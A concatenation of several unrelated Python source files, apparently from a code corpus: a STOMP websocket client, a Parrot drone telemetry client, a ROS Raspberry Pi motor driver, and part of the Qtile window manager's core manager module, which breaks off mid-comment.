verbose_name_plural = verbose_name = "Additional Search options"
|
stomp.py | import websocket
import time
from threading import Thread
BYTE = {
'LF': '\x0A',
'NULL': '\x00'
}
VERSIONS = '1.0,1.1'
class Stomp:
def __init__(self, host, sockjs=False, wss=True,debug=False):
"""
Initialize STOMP communication. This is the high level API that is exposed to clients.
Args:
host: Hostname
sockjs: True if the STOMP server is sockjs
wss: True if communication is over SSL
"""
# websocket.enableTrace(True)
self.debug=debug
ws_host = host if sockjs is False else host + "/websocket"
protocol = "ws://" if wss is False else "wss://"
self.url = protocol + ws_host
if self.debug:
print('you are connecting to '+self.url)
self.dispatcher = Dispatcher(self)
# maintain callback registry for subscriptions -> topic (str) vs callback (func)
self.callback_registry = {}
def setDebug(self, isEnabled):
self.debug=isEnabled
def connect(self):
"""
Connect to the remote STOMP server
"""
# set flag to false
self.connected = False
# attempt to connect
self.dispatcher.connect()
# wait until connected
while self.connected is False:
time.sleep(1)
return self.connected
def subscribe(self, destination, callback):
"""
Subscribe to a destination and supply a callback that should be executed when a message is received on that destination
"""
# create entry in registry against destination
self.callback_registry[destination] = callback
self.dispatcher.subscribe(destination)
def send(self, destination, message):
"""
Send a message to a destination
"""
self.dispatcher.send(destination, message)
class Dispatcher:
def __init__(self, stomp):
"""
The Dispatcher handles all network I/O and frame marshalling/unmarshalling
"""
self.stomp = stomp
self.subId=1
self.ws = websocket.WebSocketApp(self.stomp.url)
# register websocket callbacks
self.ws.on_open = self._on_open
self.ws.on_message = self._on_message
self.ws.on_error = self._on_error
self.ws.on_close = self._on_close
self.opened = False
# run event loop on separate thread
Thread(target=self.ws.run_forever).start()
# wait until connected
while self.opened is False:
time.sleep(1)
def _on_message(self, message):
"""
Executed when messages is received on WS
"""
if self.stomp.debug:
print("<<< " + message)
command, headers, body = self._parse_message(message)
# if connected, let Stomp know
if command == "CONNECTED":
self.stomp.connected = True
# if message received, call appropriate callback
if command == "MESSAGE":
self.stomp.callback_registry[headers['destination']](body)
def _on_error(self, error):
"""
Executed when WS connection errors out
"""
print(error)
def _on_close(self):
"""
Executed when WS connection is closed
"""
print("### closed ###")
def _on_open(self):
"""
Executed when WS connection is opened
"""
self.opened = True
print("### ws connected ###")
def _transmit(self, command, headers, msg=None):
"""
Marshalls and transmits the frame
"""
# Contruct the frame
lines = []
lines.append(command + BYTE['LF'])
# add headers
for key in headers:
lines.append(key + ":" + headers[key] + BYTE['LF'])
lines.append(BYTE['LF'])
# add message, if any
if msg is not None:
lines.append(msg)
# terminate with null octet
lines.append(BYTE['NULL'])
frame = ''.join(lines)
# transmit over ws
if self.stomp.debug:
print(">>>" + frame)
self.ws.send(frame)
def _parse_message(self, frame):
"""
Returns:
command
headers
body
Args:
frame: raw frame string
"""
lines = frame.split(BYTE['LF'])
command = lines[0].strip()
headers = {}
# get all headers
i = 1
while lines[i] != '':
# get key, value from raw header
(key, value) = lines[i].split(':')
headers[key] = value
i += 1
# set body to None if there is no body
body = None if lines[i+1] == BYTE['NULL'] else lines[i+1]
return command, headers, body
def connect(self):
"""
Transmit a CONNECT frame
"""
headers = {}
headers['accept-version'] = VERSIONS
headers['heart-beat'] = '10000,10000'
self._transmit('CONNECT', headers)
def subscribe(self, destination):
"""
Transmit a SUBSCRIBE frame
"""
headers = {}
headers['id'] = 'sub-%d'%(self.subId)
self.subId+=1
headers['ack'] = 'client'
headers['destination'] = destination
self._transmit('SUBSCRIBE', headers)
def send(self, destination, message):
"""
Transmit a SEND frame
"""
headers = {}
headers['destination'] = destination
headers['content-length'] = str(len(message))
self._transmit('SEND', headers, msg=message)
|
odd.py | import sys
import logging
import os
import optparse
import signal
import threading
PARROT_COMMON = "/Documents/parrot/groundsdk/packages/common"
POMP_LIB = os.path.expanduser("~") + PARROT_COMMON + "/libpomp/python"
TELEMETRYD_LIB = os.path.expanduser("~") + PARROT_COMMON + "/telemetry/tools"
sys.path.append(POMP_LIB)
sys.path.append(TELEMETRYD_LIB)
import pomp
from tlmb_parser import TlmbSection, TlmbSample
GNDCTRL_PROTOCOL_VERSION = 1
GNDCTRL_MSG_CONN_REQ =1
GNDCTRL_MSG_CONN_RESP =2
GNDCTRL_MSG_SUBSCRIBE_REQ = 3
GNDCTRL_MSG_SUBSCRIBE_RESP = 4
GNDCTRL_MSG_UNSUBSCRIBE_REQ = 5
GNDCTRL_MSG_UNSUBSCRIBE_RESP = 6
GNDCTRL_MSG_SECTION_ADDED = 7
GNDCTRL_MSG_SECTION_REMOVED = 8
GNDCTRL_MSG_SECTION_CHANGED = 9
GNDCTRL_MSG_SECTION_SAMPLE = 10
SAMPLE_RATE = 200 * 1000 # Samples every 200ms
MSG_RATE = 1000 * 1000 # Message every 1s
#===============================================================================
#===============================================================================
_USAGE = (
"usage: %prog [<options>] <ctrladdr> <dataport>\n"
"Connect to a ishtar server\n"
"\n"
" <options>: see below\n"
" <ctrladdr> : control address\n"
" <dataport> : data port\n"
"\n"
"<ctrladdr> format:\n"
" inet:<addr>:<port>\n"
" inet6:<addr>:<port>\n"
" unix:<path>\n"
" unix:@<name>\n"
)
#===============================================================================
#===============================================================================
class GndCtrlItf(object):
def __init__(self, app, name, ctrlAddr, dataPort):
self.app = app
self.name = name
self.ctrlAddr = ctrlAddr
self.dataPort = dataPort
self.ctrlCtx = pomp.Context(GndCtrlItf._CtrlEventHandler(self))
self.dataCtx = pomp.Context(GndCtrlItf._DataEventHandler(self))
self.sections = {}
def start(self):
(family, addr) = pomp.parseAddr(self.ctrlAddr)
self.ctrlCtx.connect(family, addr)
(family, addr) = pomp.parseAddr("inet:0.0.0.0:%u" % self.dataPort)
self.dataCtx.bind(family, addr)
def stop(self):
self.ctrlCtx.stop()
self.dataCtx.stop()
def recvCtrlMsg(self, msg):
if msg.msgid == GNDCTRL_MSG_CONN_RESP:
dec = pomp.Decoder()
dec.init(msg)
status = dec.readU32()
count = dec.readU32()
logging.info("Connected: status=%d", status)
for _ in range(0, count):
key = dec.readStr()
val = dec.readStr()
logging.info("%s='%s'", key, val)
elif msg.msgid == GNDCTRL_MSG_SECTION_ADDED:
(sectionId, sectionName) = msg.read("%u%s")
section = TlmbSection(sectionId, sectionName)
self.sections[sectionId] = section
logging.info("Section added: %s(%d)", sectionName, sectionId)
elif msg.msgid == GNDCTRL_MSG_SECTION_REMOVED:
(sectionId, ) = msg.read("%u")
section = self.sections.get(sectionId, None)
if section is not None:
logging.info("Section removed: %s(%d)", section.sectionName, sectionId)
self.app.sectionRemoved(section.sectionName)
del self.sections[sectionId]
elif msg.msgid == GNDCTRL_MSG_SECTION_CHANGED:
(sectionId, buf) = msg.read("%u%p")
section = self.sections.get(sectionId, None)
if section is not None:
newSection = TlmbSection(sectionId, section.sectionName)
newSection.readHeader(buf)
logging.info("Section changed: %s(%d)", section.sectionName, sectionId)
self.sections[sectionId] = newSection
elif msg.msgid == GNDCTRL_MSG_SECTION_SAMPLE:
# Only if client is configured to receive samples on the control channel
(sectionId, sec, nsec, buf) = msg.read("%u%u%u%p")
self.recvSample(sectionId, (sec, nsec), buf)
def recvDataMsg(self, msg):
if msg.msgid == GNDCTRL_MSG_SECTION_SAMPLE:
(sectionId, sec, nsec, buf) = msg.read("%u%u%u%p")
self.recvSample(sectionId, (sec, nsec), buf)
def recvSample(self, sectionId, timestamp, buf):
section = self.sections.get(sectionId, None)
if section is None:
return
logging.debug("Sample: %s(%d) %d.%06d", section.sectionName, sectionId,
timestamp[0], timestamp[1] // 1000)
varOff = 0
for varId in range(0, len(section.varDescs)):
varDesc = section.varDescs[varId]
varLen = varDesc.getTotalSize()
if varOff + varLen > len(buf):
break
varBuf = buf[varOff:varOff+varLen]
self.app.sample(sectionId, timestamp, varId, varDesc, varBuf)
varOff += varLen
class _CtrlEventHandler(pomp.EventHandler):
def __init__(self, itf):
self.itf = itf
def onConnected(self, ctx, conn):
# Send connection request
conn.send(GNDCTRL_MSG_CONN_REQ, "%u%s%u%u%u",
GNDCTRL_PROTOCOL_VERSION, self.itf.name, self.itf.dataPort,
SAMPLE_RATE, MSG_RATE)
def onDisconnected(self, ctx, conn):
# Clear internal state
logging.info("Disconnected")
self.sections = {}
def recvMessage(self, ctx, conn, msg):
self.itf.recvCtrlMsg(msg)
class _DataEventHandler(pomp.EventHandler):
def __init__(self, itf):
self.itf = itf
def onConnected(self, ctx, conn):
pass
def onDisconnected(self, ctx, conn):
pass
def recvMessage(self, ctx, conn, msg):
self.itf.recvDataMsg(msg)
class App():
def __init__(self, args):
self.sock_family = None
self.sock_addr = None
self.running = False
self.thread = None
self.itf = GndCtrlItf(self, "example", args[0], int(args[1]))
signal.signal(signal.SIGINT,
lambda signal, frame: self._signal_handler())
signal.signal(signal.SIGTERM,
lambda signal, frame: self._signal_handler())
def _signal_handler(self):
self.running = False
def __del__(self):
if self.running:
self.stop()
def start(self):
self.running = True
self.thread = threading.Thread(target=self.worker)
self.thread.start()
def stop(self):
self.running = False
self.thread.join()
def worker(self):
# setup loop for main thread
pomp.looper.prepareLoop()
# create pomp context
self.itf.start()
# run main loop
while self.running:
pomp.looper.stepLoop(maxMsg=1, timeout=1)
# destroy pomp context
self.itf.stop()
def sectionRemoved(self, sectionName):
pass
def sample(self, sectionId, timestamp, varId, varDesc, buf):
print(sectionId, timestamp, varId, varDesc, buf)
#===============================================================================
#===============================================================================
def parseArgs():
# Setup parser
parser = optparse.OptionParser(usage=_USAGE)
parser.add_option("-q", "--quiet",
dest="quiet",
action="store_true",
default=False,
help="be quiet")
parser.add_option("-v", "--verbose",
dest="verbose",
action="store_true",
default=False,
help="verbose output")
# Parse arguments
(options, args) = parser.parse_args()
if len(args) != 2:
parser.error("Bad number or arguments")
return (options, args)
#===============================================================================
#===============================================================================
class DefOpts:
def __init__(self):
self.quiet = False
self.verbose = False
def setupLog(options):
logging.basicConfig(
level=logging.INFO,
format="[%(levelname)s][%(asctime)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
stream=sys.stderr)
logging.addLevelName(logging.CRITICAL, "C")
logging.addLevelName(logging.ERROR, "E")
logging.addLevelName(logging.WARNING, "W")
logging.addLevelName(logging.INFO, "I")
logging.addLevelName(logging.DEBUG, "D")
# Setup log level
if options.quiet == True:
logging.getLogger().setLevel(logging.CRITICAL)
elif options.verbose:
logging.getLogger().setLevel(logging.DEBUG)
#===============================================================================
#===============================================================================
if __name__ == "__main__":
# (options, args) = parseArgs()
args = ["inet:127.0.0.1:9060", 5000]
setupLog(DefOpts())
try:
app = App(args)
app.start()
except KeyboardInterrupt:
root.destroy()
sys.exit(0)
|
motor.py | #! /usr/bin/env python
import os
from multiprocessing import Process, Pipe
import rospy
from std_msgs.msg import String
from geometry_msgs.msg import Twist
import RPi.GPIO as GPIO
import time
# RPI 3 PWM motor pins
LEFT_FORW = 12
LEFT_BACK = 32
RIGHT_FORW = 33
RIGHT_BACK = 35
def twist2velocity_cb(twist, args):
"""
Ros topic cmd_vel subscription callback.
@param twist: ROS topic twist
"""
# get process pipe connection
ros_write_conn = args[0]
# logging
log_txt = "%s received -> Linear: %s Angular: %s\r" % (rospy.get_caller_id(), twist.linear, twist.angular)
log_txt = log_txt.replace('\n', ' ')
rospy.loginfo(log_txt, logger_name="motor_node_logger")
# convert twist msg to motor velocity
if twist.angular.z == 0:
speed_left = twist.linear.x
speed_right = speed_left
elif twist.angular.z != 0 and twist.linear.x == 0:
speed_right = twist.angular.z * 0.19
speed_left = - speed_right
else:
speed_angular = twist.angular.z * 0.19
speed_left = twist.linear.x - speed_angular
speed_right = twist.linear.x + speed_angular
# send motor velocities to motor process
ros_write_conn.send([speed_left, speed_right])
def motor_driver_proc(motor_read_conn):
"""
Actuate motors process.
@param s_left: speed left motor
@param s_right: speed right motor
"""
# init conn once
s_left, s_right = motor_read_conn.recv()
s_left = s_left * 100
s_right = s_right * 100
# spin worker
while True:
try:
if s_left == 0: pass
elif s_left > 0: l_pin = LEFT_FORW
else: l_pin = LEFT_BACK
if s_right == 0: pass
elif s_right > 0: r_pin = RIGHT_FORW
else: r_pin = RIGHT_BACK
# GPIO setup
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
if s_left != 0:GPIO.setup(l_pin, GPIO.OUT)
if s_right != 0:GPIO.setup(r_pin, GPIO.OUT)
if s_left != 0: l_pwm = GPIO.PWM(l_pin, 100)
if s_right != 0:r_pwm = GPIO.PWM(r_pin, 100)
# actuate
if s_left != 0: l_pwm.start(abs(s_left) if abs(s_right) < 100 else 100)
if s_right != 0:r_pwm.start(abs(s_right) if abs(s_right) < 100 else 100)
# exec till new cmd arrives
#time.sleep(0)
s_left_new, s_right_new = motor_read_conn.recv()
rospy.loginfo("TWIST SPEED: %s, %s\r" % (s_left_new, s_right_new))
s_left_new = s_left_new * 100
s_right_new = s_right_new * 100
# stop old cmd execution
if s_left != 0: l_pwm.stop()
if s_right != 0:r_pwm.stop()
# update
s_left = s_left_new
s_right = s_right_new
except Exception as ex:
rospy.logerr("%s\r" % ex)
finally:
# reset pin in/out state
GPIO.cleanup()
# yield thread
time.sleep(0)
def init_ros_node():
"""
Motor node main method.
"""
# load startup node logo
with open('./name_ascii.txt', 'r') as file:
ascii_art_str = file.read()
print("\033[1;34m" + ascii_art_str + "\033[0m")
# init motor driver process
motor_read_conn, ros_write_conn = Pipe()
pm = Process(target=motor_driver_proc, args=(motor_read_conn,))
pm.start()
# init ros subscriber node
rospy.init_node('motor_node', anonymous=False)
rospy.Subscriber("cmd_vel", Twist, twist2velocity_cb, (ros_write_conn,))
rospy.spin()
# join worker
ros_write_conn.close()
motor_read_conn.close()
pm.join()
if __name__ == '__main__':
init_ros_node()
|
manager.py | # vim: tabstop=4 shiftwidth=4 expandtab
# Copyright (c) 2008, Aldo Cortesi. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from libqtile.log_utils import init_log
from libqtile.dgroups import DGroups
from xcffib.xproto import EventMask, WindowError, AccessError, DrawableError
import atexit
import imp
import logging
import os
import os.path
import pickle
import shlex
import signal
import sys
import traceback
import threading
import xcffib
import xcffib.xinerama
import xcffib.xproto
import six
from six.moves import asyncio
from .config import Drag, Click, Screen, Match, Rule
from .group import _Group
from .state import QtileState
from .utils import QtileError
from .widget.base import _Widget, deprecated
from . import command
from . import hook
from . import utils
from . import window
from . import xcbq
class Qtile(command.CommandObject):
"""
This object is the __root__ of the command graph.
"""
def __init__(self, config,
displayName=None, fname=None, no_spawn=False, log=None,
state=None):
logkwargs = {}
if hasattr(config, "log_level"):
logkwargs["log_level"] = config.log_level
if hasattr(config, "log_path"):
logkwargs["log_path"] = config.log_path
self.log = log or init_log(**logkwargs)
logging.getLogger('asyncio').setLevel(logging.CRITICAL)
self.no_spawn = no_spawn
self._eventloop = asyncio.get_event_loop()
if not displayName:
displayName = os.environ.get("DISPLAY")
if not displayName:
raise QtileError("No DISPLAY set.")
if not fname:
# Dots might appear in the host part of the display name
# during remote X sessions. Let's strip the host part first.
displayNum = displayName.partition(":")[2]
if "." not in displayNum:
displayName = displayName + ".0"
fname = command.find_sockfile(displayName)
self.conn = xcbq.Connection(displayName)
self.config = config
self.fname = fname
hook.init(self)
self.windowMap = {}
self.widgetMap = {}
self.groupMap = {}
self.groups = []
self.keyMap = {}
# Find the modifier mask for the numlock key, if there is one:
nc = self.conn.keysym_to_keycode(xcbq.keysyms["Num_Lock"])
self.numlockMask = xcbq.ModMasks[self.conn.get_modifier(nc)]
self.validMask = ~(self.numlockMask | xcbq.ModMasks["lock"])
# Because we only do Xinerama multi-screening,
# we can assume that the first
# screen's root is _the_ root.
self.root = self.conn.default_screen.root
self.root.set_attribute(
eventmask=(
EventMask.StructureNotify |
EventMask.SubstructureNotify |
EventMask.SubstructureRedirect |
EventMask.EnterWindow |
EventMask.LeaveWindow
)
)
self.root.set_property(
'_NET_SUPPORTED',
[self.conn.atoms[x] for x in xcbq.SUPPORTED_ATOMS]
)
self.supporting_wm_check_window = self.conn.create_window(-1, -1, 1, 1)
self.root.set_property(
'_NET_SUPPORTING_WM_CHECK',
self.supporting_wm_check_window.wid
)
wmname = getattr(self.config, "wmname", "qtile")
self.supporting_wm_check_window.set_property('_NET_WM_NAME', wmname)
self.supporting_wm_check_window.set_property(
'_NET_SUPPORTING_WM_CHECK',
self.supporting_wm_check_window.wid
)
if config.main:
config.main(self)
self.dgroups = None
if self.config.groups:
key_binder = None
if hasattr(self.config, 'dgroups_key_binder'):
key_binder = self.config.dgroups_key_binder
self.dgroups = DGroups(self, self.config.groups, key_binder)
if hasattr(config, "widget_defaults") and config.widget_defaults:
_Widget.global_defaults = config.widget_defaults
else:
_Widget.global_defaults = {}
for i in self.groups:
self.groupMap[i.name] = i
self.currentScreen = None
self.screens = []
self._process_screens()
self.currentScreen = self.screens[0]
self._drag = None
self.ignoreEvents = set([
xcffib.xproto.KeyReleaseEvent,
xcffib.xproto.ReparentNotifyEvent,
xcffib.xproto.CreateNotifyEvent,
# DWM handles this to help "broken focusing windows".
xcffib.xproto.MapNotifyEvent,
xcffib.xproto.LeaveNotifyEvent,
xcffib.xproto.FocusOutEvent,
xcffib.xproto.FocusInEvent,
xcffib.xproto.NoExposureEvent
])
self.setup_python_dbus()
self.conn.flush()
self.conn.xsync()
self._xpoll()
self.server = command._Server(self.fname, self, config)
# Map and Grab keys
for key in self.config.keys:
self.mapKey(key)
# It fixes problems with focus when clicking windows of some specific clients like xterm
def noop(qtile):
pass
self.config.mouse += (Click([], "Button1", command.lazy.function(noop), focus="after"),)
self.mouseMap = {}
for i in self.config.mouse:
if self.mouseMap.get(i.button_code) is None:
self.mouseMap[i.button_code] = []
self.mouseMap[i.button_code].append(i)
self.grabMouse()
# no_spawn is set when we are restarting; we only want to run the
# startup hook once.
if not no_spawn:
hook.fire("startup_once")
hook.fire("startup")
self.scan()
self.update_net_desktops()
hook.subscribe.setgroup(self.update_net_desktops)
if state:
st = pickle.load(six.BytesIO(state.encode()))
st.apply(self)
self.selection = {
"PRIMARY": {"owner": None, "selection": ""},
"CLIPBOARD": {"owner": None, "selection": ""}
}
self.setup_selection()
def setup_selection(self):
PRIMARY = self.conn.atoms["PRIMARY"]
CLIPBOARD = self.conn.atoms["CLIPBOARD"]
self.selection_window = self.conn.create_window(-1, -1, 1, 1)
self.selection_window.set_attribute(eventmask=EventMask.PropertyChange)
self.conn.xfixes.select_selection_input(self.selection_window,
"PRIMARY")
self.conn.xfixes.select_selection_input(self.selection_window,
"CLIPBOARD")
r = self.conn.conn.core.GetSelectionOwner(PRIMARY).reply()
self.selection["PRIMARY"]["owner"] = r.owner
r = self.conn.conn.core.GetSelectionOwner(CLIPBOARD).reply()
self.selection["CLIPBOARD"]["owner"] = r.owner
# ask for selection on starup
self.convert_selection(PRIMARY)
self.convert_selection(CLIPBOARD)
def setup_python_dbus(self):
# This is a little strange. python-dbus internally depends on gobject,
# so gobject's threads need to be running, and a gobject "main loop
# thread" needs to be spawned, but we try to let it only interact with
# us via calls to asyncio's call_soon_threadsafe.
try:
# We import dbus here to thrown an ImportError if it isn't
# available. Since the only reason we're running this thread is
# because of dbus, if dbus isn't around there's no need to run
# this thread.
import dbus # noqa
from gi.repository import GObject
GObject.threads_init()
def gobject_thread():
ctx = GObject.main_context_default()
while not self._eventloop.is_closed():
try:
ctx.iteration(True)
except Exception:
self.qtile.exception("got exception from gobject")
t = threading.Thread(target=gobject_thread, name="gobject_thread")
t.start()
except ImportError:
self.log.warning("importing dbus/gobject failed, dbus will not work.")
def _process_fake_screens(self):
"""
Since Xephyr, Xnest don't really support offset screens,
we'll fake it here for testing, (or if you want to partition
a physical monitor into separate screens)
"""
for i, s in enumerate(self.config.fake_screens):
# should have x,y, width and height set
s._configure(self, i, s.x, s.y, s.width, s.height, self.groups[i])
if not self.currentScreen:
self.currentScreen = s
self.screens.append(s)
def _process_screens(self):
if hasattr(self.config, 'fake_screens'):
self._process_fake_screens()
return
# What's going on here is a little funny. What we really want is only
# screens that don't overlap here; overlapping screens should see the
# same parts of the root window (i.e. for people doing xrandr
# --same-as). However, the order that X gives us psuedoscreens in is
# important, because it indicates what people have chosen via xrandr
# --primary or whatever. So we need to alias screens that should be
# aliased, but preserve order as well. See #383.
xywh = {}
screenpos = []
for s in self.conn.pseudoscreens:
pos = (s.x, s.y)
(w, h) = xywh.get(pos, (0, 0))
if pos not in xywh:
screenpos.append(pos)
xywh[pos] = (max(w, s.width), max(h, s.height))
for i, (x, y) in enumerate(screenpos):
(w, h) = xywh[(x, y)]
if i + 1 > len(self.config.screens):
scr = Screen()
else:
scr = self.config.screens[i]
if not self.currentScreen:
self.currentScreen = scr
scr._configure(
self,
i,
x,
y,
w,
h,
self.groups[i],
)
self.screens.append(scr)
if not self.screens:
if self.config.screens:
s = self.config.screens[0]
else:
s = Screen()
self.currentScreen = s
s._configure(
self,
0, 0, 0,
self.conn.default_screen.width_in_pixels,
self.conn.default_screen.height_in_pixels,
self.groups[0],
)
self.screens.append(s)
def mapKey(self, key):
self.keyMap[(key.keysym, key.modmask & self.validMask)] = key
code = self.conn.keysym_to_keycode(key.keysym)
self.root.grab_key(
code,
key.modmask,
True,
xcffib.xproto.GrabMode.Async,
xcffib.xproto.GrabMode.Async,
)
if self.numlockMask:
self.root.grab_key(
code,
key.modmask | self.numlockMask,
True,
xcffib.xproto.GrabMode.Async,
xcffib.xproto.GrabMode.Async,
)
self.root.grab_key(
code,
key.modmask | self.numlockMask | xcbq.ModMasks["lock"],
True,
xcffib.xproto.GrabMode.Async,
xcffib.xproto.GrabMode.Async,
)
def unmapKey(self, key):
key_index = (key.keysym, key.modmask & self.validMask)
if key_index not in self.keyMap:
return
code = self.conn.keysym_to_keycode(key.keysym)
self.root.ungrab_key(code, key.modmask)
if self.numlockMask:
self.root.ungrab_key(code, key.modmask | self.numlockMask)
self.root.ungrab_key(
code,
key.modmask | self.numlockMask | xcbq.ModMasks["lock"]
)
del(self.keyMap[key_index])
def update_net_desktops(self):
try:
index = self.groups.index(self.currentGroup)
# TODO: we should really only except ValueError here, AttributeError is
# an annoying chicken and egg because we're accessing currentScreen
# (via currentGroup), and when we set up the initial groups, there
# aren't any screens yet. This can probably be changed when #475 is
# fixed.
except (ValueError, AttributeError):
index = 0
self.root.set_property("_NET_NUMBER_OF_DESKTOPS", len(self.groups))
self.root.set_property(
"_NET_DESKTOP_NAMES", "\0".join([i.name for i in self.groups])
)
self.root.set_property("_NET_CURRENT_DESKTOP", index)
def addGroup(self, name, layout=None, layouts=None):
if name not in self.groupMap.keys():
g = _Group(name, layout)
self.groups.append(g)
if not layouts:
layouts = self.config.layouts
g._configure(layouts, self.config.floating_layout, self)
self.groupMap[name] = g
hook.fire("addgroup", self, name)
hook.fire("changegroup")
self.update_net_desktops()
return True
return False
def delGroup(self, name):
# one group per screen is needed
if len(self.groups) == len(self.screens):
raise ValueError("Can't delete all groups.")
if name in self.groupMap.keys():
group = self.groupMap[name]
if group.screen and group.screen.previous_group:
target = group.screen.previous_group
else:
target = group.prevGroup()
# Find a group that's not currently on a screen to bring to the
# front. This will terminate because of our check above.
while target.screen:
target = target.prevGroup()
for i in list(group.windows):
i.togroup(target.name)
if self.currentGroup.name == name:
self.currentScreen.setGroup(target, save_prev=False)
self.groups.remove(group)
del(self.groupMap[name])
hook.fire("delgroup", self, name)
hook.fire("changegroup")
self.update_net_desktops()
def registerWidget(self, w):
"""
Register a bar widget. If a widget with the same name already
exists, this will silently ignore that widget. However, this is
not necessarily a bug. By default a widget's name is just
self.__class__.lower(), so putting multiple widgets of the same
class will alias and one will be inaccessable. Since more than one
groupbox widget is useful when you have more than one screen, this
is a not uncommon occurrence. If you want to use the debug
info for widgets with the same name, set the name yourself.
"""
if w.name:
if w.name in self.widgetMap:
return
self.widgetMap[w.name] = w
@utils.LRUCache(200)
def colorPixel(self, name):
return self.conn.screens[0].default_colormap.alloc_color(name).pixel
@property
def currentLayout(self):
return self.currentGroup.layout
@property
def currentGroup(self):
return self.currentScreen.group
@property
def currentWindow(self):
return self.currentScreen.group.currentWindow
def scan(self):
_, _, children = self.root.query_tree()
for item in children:
try:
attrs = item.get_attributes()
state = item.get_wm_state()
except (xcffib.xproto.WindowError, xcffib.xproto.AccessError):
continue
if attrs and attrs.map_state == xcffib.xproto.MapState.Unmapped:
continue
if state and state[0] == window.WithdrawnState:
continue
self.manage(item)
def unmanage(self, win):
c = self.windowMap.get(win)
if c:
hook.fire("client_killed", c)
self.reset_gaps(c)
if getattr(c, "group", None):
c.group.remove(c)
del self.windowMap[win]
self.update_client_list()
def reset_gaps(self, c):
if c.strut:
self.update_gaps((0, 0, 0, 0), c.strut)
def update_gaps(self, strut, old_strut=None):
from libqtile.bar import Gap
(left, right, top, bottom) = strut[:4]
if old_strut:
(old_left, old_right, old_top, old_bottom) = old_strut[:4]
if not left and old_left:
self.currentScreen.left = None
elif not right and old_right:
self.currentScreen.right = None
elif not top and old_top:
self.currentScreen.top = None
elif not bottom and old_bottom:
self.currentScreen.bottom = None
if top:
self.currentScreen.top = Gap(top)
elif bottom:
self.currentScreen.bottom = Gap(bottom)
elif left:
self.currentScreen.left = Gap(left)
elif right:
self.currentScreen.right = Gap(right)
self.currentScreen.resize()
def manage(self, w):
try:
attrs = w.get_attributes()
internal = w.get_property("QTILE_INTERNAL")
except (xcffib.xproto.WindowError, xcffib.xproto.AccessError):
return
if attrs and attrs.override_redirect:
return
if w.wid not in self.windowMap:
if internal:
try:
c = window.Internal(w, self)
except (xcffib.xproto.WindowError, xcffib.xproto.AccessError):
return
self.windowMap[w.wid] = c
else:
try:
c = window.Window(w, self)
except (xcffib.xproto.WindowError, xcffib.xproto.AccessError):
return
if w.get_wm_type() == "dock" or c.strut:
c.static(self.currentScreen.index)
else:
hook.fire("client_new", c)
# Window may be defunct because
# it's been declared static in hook.
if c.defunct:
return
self.windowMap[w.wid] = c
# Window may have been bound to a group in the hook.
if not c.group:
self.currentScreen.group.add(c, focus=c.can_steal_focus())
self.update_client_list()
hook.fire("client_managed", c)
return c
else:
return self.windowMap[w.wid]
def update_client_list(self):
"""
Updates the client stack list
this is needed for third party tasklists
and drag and drop of tabs in chrome
"""
windows = [wid for wid, c in self.windowMap.items() if c.group]
self.root.set_property("_NET_CLIENT_LIST", windows)
# TODO: check stack order
self.root.set_property("_NET_CLIENT_LIST_STACKING", windows)
def grabMouse(self):
self.root.ungrab_button(None, None)
for i in self.config.mouse:
if isinstance(i, Click) and i.focus:
# Make a freezing grab on mouse button to gain focus
# Event will propagate to target window
grabmode = xcffib.xproto.GrabMode.Sync
else:
grabmode = xcffib.xproto.GrabMode.Async
eventmask = EventMask.ButtonPress
if isinstance(i, Drag):
eventmask |= EventMask.ButtonRelease
self.root.grab_button(
i.button_code,
i.modmask,
True,
eventmask,
grabmode,
xcffib.xproto.GrabMode.Async,
)
if self.numlockMask:
self.root.grab_button(
i.button_code,
i.modmask | self.numlockMask,
True,
eventmask,
grabmode,
xcffib.xproto.GrabMode.Async,
)
self.root.grab_button(
i.button_code,
i.modmask | self.numlockMask | xcbq.ModMasks["lock"],
True,
eventmask,
grabmode,
xcffib.xproto.GrabMode.Async,
)
def grabKeys(self):
self.root.ungrab_key(None, None)
for key in self.keyMap.values():
self.mapKey(key)
def get_target_chain(self, ename, e):
"""
Returns a chain of targets that can handle this event. The event
will be passed to each target in turn for handling, until one of
the handlers returns False or the end of the chain is reached.
"""
chain = []
handler = "handle_%s" % ename
# Certain events expose the affected window id as an "event" attribute.
eventEvents = [
"EnterNotify",
"ButtonPress",
"ButtonRelease",
"KeyPress",
]
c = None
if hasattr(e, "window"):
c = self.windowMap.get(e.window)
elif hasattr(e, "drawable"):
c = self.windowMap.get(e.drawable)
elif ename in eventEvents:
c = self.windowMap.get(e.event)
if c and hasattr(c, handler):
chain.append(getattr(c, handler))
if hasattr(self, handler):
chain.append(getattr(self, handler))
if not chain:
self.log.info("Unknown event: %r" % ename)
return chain
def _xpoll(self):
while True:
try:
e = self.conn.conn.poll_for_event()
if not e:
break
ename = e.__class__.__name__
if ename.endswith("Event"):
ename = ename[:-5]
if e.__class__ not in self.ignoreEvents:
self.log.debug(ename)
for h in self.get_target_chain(ename, e):
self.log.info("Handling: %s" % ename)
r = h(e)
if not r:
break
except Exception as e:
error_code = self.conn.conn.has_error()
if error_code:
error_string = xcbq.XCB_CONN_ERRORS[error_code]
self.log.exception("Shutting down due to X connection error %s (%s)" %
(error_string, error_code))
self.conn.disconnect()
self.log.exception("Got an exception in poll loop")
# Any changes these events triggered should be flushed to the server.
try:
self.conn.flush()
# Catch some bad X exceptions. Since X is event based, race
# conditions can occur almost anywhere in the code. For
# example, if a window is created and then immediately
# destroyed (before the event handler is evoked), when the
# event handler tries to examine the window properties, it
# will throw a WindowError exception. We can essentially
# ignore it, since the window is already dead and we've got
